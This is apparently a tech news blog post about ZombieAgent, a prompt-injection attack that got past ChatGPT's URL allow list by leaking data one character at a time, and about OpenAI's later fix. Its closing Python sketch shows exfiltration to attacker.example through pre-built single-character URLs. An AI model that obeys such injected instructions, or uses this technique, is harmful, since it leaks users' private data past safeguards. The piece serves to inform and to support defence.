{"id":211,"date":"2026-01-08T19:47:59","date_gmt":"2026-01-08T19:47:59","guid":{"rendered":"https:\/\/nile1.com\/en\/?p=211"},"modified":"2026-01-11T23:38:23","modified_gmt":"2026-01-11T23:38:23","slug":"chatgpts-ongoing-battle-new-zombieagent-attack-bypasses-url-safeguards","status":"publish","type":"post","link":"https:\/\/nile1.com\/en\/2026\/01\/08\/chatgpts-ongoing-battle-new-zombieagent-attack-bypasses-url-safeguards\/","title":{"rendered":"ChatGPT&#8217;s Ongoing Battle: New &#8216;ZombieAgent&#8217; Attack Bypasses URL Safeguards"},"content":{"rendered":"<p>OpenAI implemented a strict URL policy for ChatGPT, allowing it to open only exact links and preventing the addition of parameters. This measure successfully countered ShadowLeak, an attack that exploited the large language model&#8217;s ability to create new URLs by combining words, appending query parameters, or inserting user data.<\/p>\n<p>However, Radware researchers devised ZombieAgent, a straightforward modification to the prompt injection technique. Their method involved providing a comprehensive list of pre-constructed URLs, each appending a single character\u2014a letter (e.g., example.com\/a, example.com\/b) or a number (example.com\/0 through example.com\/9)\u2014to a base URL. The prompt also directed the agent to replace spaces with a specific token.<\/p>\n<figure><figcaption>Diagram illustrating the URL-based character exfiltration for bypassing the allow list introduced in ChatGPT in response to ShadowLeak.<br \/>Credit: Radware<\/figcaption><\/figure>\n<p>ZombieAgent succeeded because OpenAI&#8217;s restrictions did not prevent the appending of a single character to a URL. This oversight enabled the attack to exfiltrate data one character at a time.<\/p>\n<p>OpenAI has since addressed ZombieAgent by limiting ChatGPT&#8217;s ability to open links from emails. The model now only opens such links if they are listed in a public index or explicitly provided by the user within a chat prompt. 
<p>This adjustment aims to keep the agent from reaching base URLs controlled by attackers.</p>
<p>OpenAI&#8217;s experience reflects a familiar cycle in cybersecurity: an attack is mitigated, only to reappear with minor alterations. The pattern, reminiscent of persistent threats such as SQL injection and memory-corruption vulnerabilities, is expected to continue indefinitely, giving attackers ongoing opportunities to compromise software and websites.</p>
<p>Pascal Geenens, VP of threat intelligence at Radware, emphasized that &#8220;Guardrails should not be considered fundamental solutions for the prompt injection problems.&#8221; He added, &#8220;Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.&#8221;</p>
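<p>To make ZombieAgent&#8217;s bypass concrete, here is a minimal sketch of character-by-character exfiltration against a hypothetical exact-match allow list. All names and the space-replacement token are illustrative assumptions; this is neither Radware&#8217;s proof of concept nor OpenAI&#8217;s filtering code.</p>

```python
# Illustrative sketch of ZombieAgent-style exfiltration: every
# per-character URL is itself an exact, pre-constructed entry, so a
# policy that only blocks *constructed* URLs (new paths, appended query
# parameters) never sees anything suspicious in any single request.

BASE = "https://attacker.example/"

# The injected prompt supplies one pre-built URL per character; the
# agent only picks from this list, never builds a URL itself.
ALLOWED = {BASE + c for c in "abcdefghijklmnopqrstuvwxyz0123456789_"}

def is_exact_allowed(url: str) -> bool:
    """Exact-match check: the URL must appear verbatim in the list."""
    return url in ALLOWED

def exfiltrate(secret: str) -> list[str]:
    """Leak `secret` one character per request via allow-listed URLs,
    replacing spaces with a designated token ('_' in this sketch).
    Characters outside the charset are silently skipped."""
    request_log = []
    for ch in secret.lower():
        ch = "_" if ch == " " else ch
        url = BASE + ch
        if is_exact_allowed(url):   # every individual request passes
            request_log.append(url)
    return request_log

request_log = exfiltrate("acme corp")
# The attacker's server reconstructs the secret from the request order:
leaked = "".join(u.removeprefix(BASE) for u in request_log).replace("_", " ")
print(leaked)   # acme corp
```

<p>The point of the sketch is that the defense and the attack never disagree on any single request; the leak only exists in the <em>sequence</em> of otherwise-innocuous fetches, which is why blocking parameter appending alone was insufficient.</p>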